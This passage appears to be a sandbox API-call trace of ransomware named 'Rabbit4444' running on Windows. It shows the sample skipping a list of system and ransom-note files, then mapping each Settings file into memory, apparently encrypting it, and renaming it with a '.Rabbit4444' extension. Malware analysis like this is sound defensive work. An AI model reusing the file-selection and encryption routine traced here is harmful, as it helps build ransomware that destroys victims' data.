(lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{FEBB9292-6110-4B9E-8565-91C4076E0A43}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.781] lstrlenW (lpString="Classic_{FEBB9292-6110-4B9E-8565-91C4076E0A43}.settingcontent-ms") returned 64 [0059.781] lstrlenW (lpString="Rabbit4444") returned 10 [0059.781] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.781] lstrlenW (lpString=".dll") returned 4 [0059.781] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.781] lstrlenW (lpString=".lnk") returned 4 [0059.781] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.781] lstrlenW (lpString=".ini") returned 4 [0059.781] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.781] lstrlenW (lpString=".sys") returned 4 [0059.781] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.781] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{FEBB9292-6110-4B9E-8565-91C4076E0A43}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{febb9292-6110-4b9e-8565-91c4076e0a43}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.782] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.782] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15109255976) returned 1 [0059.782] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1032) returned 1 [0059.782] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0059.782] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0059.782] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x710, lpName=0x0) returned 0x298 [0059.783] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x710) returned 0x70000 [0059.784] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.784] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0059.784] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.784] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0059.784] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.784] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0059.784] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.784] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0059.784] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15109524032) returned 1 [0059.785] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0059.785] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0059.785] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.785] CloseHandle (hObject=0x298) returned 1 [0059.785] CloseHandle (hObject=0x278) returned 1 [0059.785] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{FEBB9292-6110-4B9E-8565-91C4076E0A43}.settingcontent-ms.Rabbit4444") returned 192 [0059.785] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{FEBB9292-6110-4B9E-8565-91C4076E0A43}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{febb9292-6110-4b9e-8565-91c4076e0a43}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{FEBB9292-6110-4B9E-8565-91C4076E0A43}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{febb9292-6110-4b9e-8565-91c4076e0a43}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.786] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57da88ca, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x57da88ca, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x22145f46, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x38f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{FEFF8F5D-EB40-485d-AC2A-EB7942DDF624}.settingcontent-ms", cAlternateFileName="CL4FB4~1.SET")) returned 1 [0059.786] lstrcmpiW (lpString1="Classic_{FEFF8F5D-EB40-485d-AC2A-EB7942DDF624}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.786] lstrcmpiW (lpString1="Classic_{FEFF8F5D-EB40-485d-AC2A-EB7942DDF624}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.786] lstrcmpiW (lpString1="Classic_{FEFF8F5D-EB40-485d-AC2A-EB7942DDF624}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.786] lstrcmpiW (lpString1="Classic_{FEFF8F5D-EB40-485d-AC2A-EB7942DDF624}.settingcontent-ms", lpString2=".") returned 1 [0059.786] lstrcmpiW (lpString1="Classic_{FEFF8F5D-EB40-485d-AC2A-EB7942DDF624}.settingcontent-ms", lpString2="..") returned 1 [0059.786] lstrcmpiW (lpString1="Classic_{FEFF8F5D-EB40-485d-AC2A-EB7942DDF624}.settingcontent-ms", lpString2="windows") returned -1 [0059.786] lstrcmpiW (lpString1="Classic_{FEFF8F5D-EB40-485d-AC2A-EB7942DDF624}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.786] lstrcmpiW (lpString1="Classic_{FEFF8F5D-EB40-485d-AC2A-EB7942DDF624}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.786] lstrcmpiW (lpString1="Classic_{FEFF8F5D-EB40-485d-AC2A-EB7942DDF624}.settingcontent-ms", lpString2="boot") returned 1 [0059.786] lstrcmpiW (lpString1="Classic_{FEFF8F5D-EB40-485d-AC2A-EB7942DDF624}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.786] lstrcmpiW (lpString1="Classic_{FEFF8F5D-EB40-485d-AC2A-EB7942DDF624}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.786] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{FEFF8F5D-EB40-485d-AC2A-EB7942DDF624}.settingcontent-ms" | out: lpString1="Classic_{FEFF8F5D-EB40-485d-AC2A-EB7942DDF624}.settingcontent-ms") returned="Classic_{FEFF8F5D-EB40-485d-AC2A-EB7942DDF624}.settingcontent-ms" [0059.786] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{FEFF8F5D-EB40-485d-AC2A-EB7942DDF624}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.786] lstrlenW (lpString="Classic_{FEFF8F5D-EB40-485d-AC2A-EB7942DDF624}.settingcontent-ms") returned 64 [0059.786] lstrlenW (lpString="Rabbit4444") returned 10 [0059.787] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.787] lstrlenW (lpString=".dll") returned 4 [0059.787] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.787] lstrlenW (lpString=".lnk") returned 4 [0059.787] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.787] lstrlenW (lpString=".ini") returned 4 [0059.787] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.787] lstrlenW (lpString=".sys") returned 4 [0059.787] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.787] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{FEFF8F5D-EB40-485d-AC2A-EB7942DDF624}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{feff8f5d-eb40-485d-ac2a-eb7942ddf624}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.787] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.787] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15109783146) returned 1 [0059.787] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=911) returned 1 [0059.787] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0059.787] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0059.787] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x690, lpName=0x0) returned 0x298 [0059.788] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x690) returned 0x70000 [0059.789] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.789] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0059.789] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.789] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0059.789] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.789] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0059.790] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.790] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0059.790] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15110034236) returned 1 [0059.790] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0059.790] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0059.790] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.790] CloseHandle (hObject=0x298) returned 1 [0059.790] CloseHandle (hObject=0x278) returned 1 [0059.790] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{FEFF8F5D-EB40-485d-AC2A-EB7942DDF624}.settingcontent-ms.Rabbit4444") returned 192 [0059.790] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{FEFF8F5D-EB40-485d-AC2A-EB7942DDF624}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{feff8f5d-eb40-485d-ac2a-eb7942ddf624}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{FEFF8F5D-EB40-485d-AC2A-EB7942DDF624}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{feff8f5d-eb40-485d-ac2a-eb7942ddf624}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.791] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57e41239, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x57e41239, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x22204b03, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x37f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{FFA33B6C-DC4D-438C-893F-EBF44A09BFC0}.settingcontent-ms", cAlternateFileName="CLC171~1.SET")) returned 1 [0059.791] lstrcmpiW (lpString1="Classic_{FFA33B6C-DC4D-438C-893F-EBF44A09BFC0}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.791] lstrcmpiW (lpString1="Classic_{FFA33B6C-DC4D-438C-893F-EBF44A09BFC0}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.791] lstrcmpiW (lpString1="Classic_{FFA33B6C-DC4D-438C-893F-EBF44A09BFC0}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.791] lstrcmpiW (lpString1="Classic_{FFA33B6C-DC4D-438C-893F-EBF44A09BFC0}.settingcontent-ms", lpString2=".") returned 1 [0059.791] lstrcmpiW (lpString1="Classic_{FFA33B6C-DC4D-438C-893F-EBF44A09BFC0}.settingcontent-ms", lpString2="..") returned 1 [0059.791] lstrcmpiW (lpString1="Classic_{FFA33B6C-DC4D-438C-893F-EBF44A09BFC0}.settingcontent-ms", lpString2="windows") returned -1 [0059.791] lstrcmpiW (lpString1="Classic_{FFA33B6C-DC4D-438C-893F-EBF44A09BFC0}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.791] lstrcmpiW (lpString1="Classic_{FFA33B6C-DC4D-438C-893F-EBF44A09BFC0}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.791] lstrcmpiW (lpString1="Classic_{FFA33B6C-DC4D-438C-893F-EBF44A09BFC0}.settingcontent-ms", lpString2="boot") returned 1 [0059.791] lstrcmpiW (lpString1="Classic_{FFA33B6C-DC4D-438C-893F-EBF44A09BFC0}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.791] lstrcmpiW (lpString1="Classic_{FFA33B6C-DC4D-438C-893F-EBF44A09BFC0}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.791] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{FFA33B6C-DC4D-438C-893F-EBF44A09BFC0}.settingcontent-ms" | out: lpString1="Classic_{FFA33B6C-DC4D-438C-893F-EBF44A09BFC0}.settingcontent-ms") returned="Classic_{FFA33B6C-DC4D-438C-893F-EBF44A09BFC0}.settingcontent-ms" [0059.791] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{FFA33B6C-DC4D-438C-893F-EBF44A09BFC0}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.792] lstrlenW (lpString="Classic_{FFA33B6C-DC4D-438C-893F-EBF44A09BFC0}.settingcontent-ms") returned 64 [0059.792] lstrlenW (lpString="Rabbit4444") returned 10 [0059.792] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.792] lstrlenW (lpString=".dll") returned 4 [0059.792] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.792] lstrlenW (lpString=".lnk") returned 4 [0059.792] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.792] lstrlenW (lpString=".ini") returned 4 [0059.792] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.792] lstrlenW (lpString=".sys") returned 4 [0059.792] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.792] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{FFA33B6C-DC4D-438C-893F-EBF44A09BFC0}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{ffa33b6c-dc4d-438c-893f-ebf44a09bfc0}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.792] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.792] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15110313150) returned 1 [0059.792] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=895) returned 1 [0059.792] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0059.793] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1021d8 [0059.793] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x680, lpName=0x0) returned 0x298 [0059.794] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x680) returned 0x70000 [0059.795] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.795] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0059.795] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.795] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0059.795] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.795] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0059.795] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.795] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0059.795] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15110626860) returned 1 [0059.796] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0059.796] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1021d8 | out: hHeap=0xe0000) returned 1 [0059.796] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.796] CloseHandle (hObject=0x298) returned 1 [0059.796] CloseHandle (hObject=0x278) returned 1 [0059.796] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{FFA33B6C-DC4D-438C-893F-EBF44A09BFC0}.settingcontent-ms.Rabbit4444") returned 192 [0059.796] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{FFA33B6C-DC4D-438C-893F-EBF44A09BFC0}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{ffa33b6c-dc4d-438c-893f-ebf44a09bfc0}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{FFA33B6C-DC4D-438C-893F-EBF44A09BFC0}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{ffa33b6c-dc4d-438c-893f-ebf44a09bfc0}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.797] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57ed9ba5, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x57ed9ba5, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2433f6fa, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2e7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ControlPanel.settingcontent-ms", cAlternateFileName="CONTRO~1.SET")) returned 1 [0059.797] lstrcmpiW (lpString1="ControlPanel.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.797] lstrcmpiW (lpString1="ControlPanel.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.797] lstrcmpiW (lpString1="ControlPanel.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.797] lstrcmpiW (lpString1="ControlPanel.settingcontent-ms", lpString2=".") returned 1 [0059.797] lstrcmpiW (lpString1="ControlPanel.settingcontent-ms", lpString2="..") returned 1 [0059.797] lstrcmpiW (lpString1="ControlPanel.settingcontent-ms", lpString2="windows") returned -1 [0059.797] lstrcmpiW (lpString1="ControlPanel.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.797] lstrcmpiW (lpString1="ControlPanel.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.797] lstrcmpiW (lpString1="ControlPanel.settingcontent-ms", lpString2="boot") returned 1 [0059.797] lstrcmpiW (lpString1="ControlPanel.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.797] lstrcmpiW (lpString1="ControlPanel.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.797] lstrcpyW (in: lpString1=0x130ec22, lpString2="ControlPanel.settingcontent-ms" | out: lpString1="ControlPanel.settingcontent-ms") returned="ControlPanel.settingcontent-ms" [0059.797] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\ControlPanel.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.797] lstrlenW (lpString="ControlPanel.settingcontent-ms") returned 30 [0059.797] lstrlenW (lpString="Rabbit4444") returned 10 [0059.797] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.798] lstrlenW (lpString=".dll") returned 4 [0059.798] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.798] lstrlenW (lpString=".lnk") returned 4 [0059.798] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.798] lstrlenW (lpString=".ini") returned 4 [0059.798] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.798] lstrlenW (lpString=".sys") returned 4 [0059.798] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.798] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\ControlPanel.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\controlpanel.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.798] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.798] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15110883332) returned 1 [0059.798] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=743) returned 1 [0059.798] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0059.798] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d10 [0059.799] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5f0, lpName=0x0) returned 0x298 [0059.799] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5f0) returned 0x70000 [0059.800] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.800] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0059.800] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.800] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0059.801] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.801] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0059.801] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.801] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0059.801] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15111162023) returned 1 [0059.801] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0059.801] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d10 | out: hHeap=0xe0000) returned 1 [0059.801] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.801] CloseHandle (hObject=0x298) returned 1 [0059.801] CloseHandle (hObject=0x278) returned 1 [0059.801] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\ControlPanel.settingcontent-ms.Rabbit4444") returned 158 [0059.801] MoveFileExW 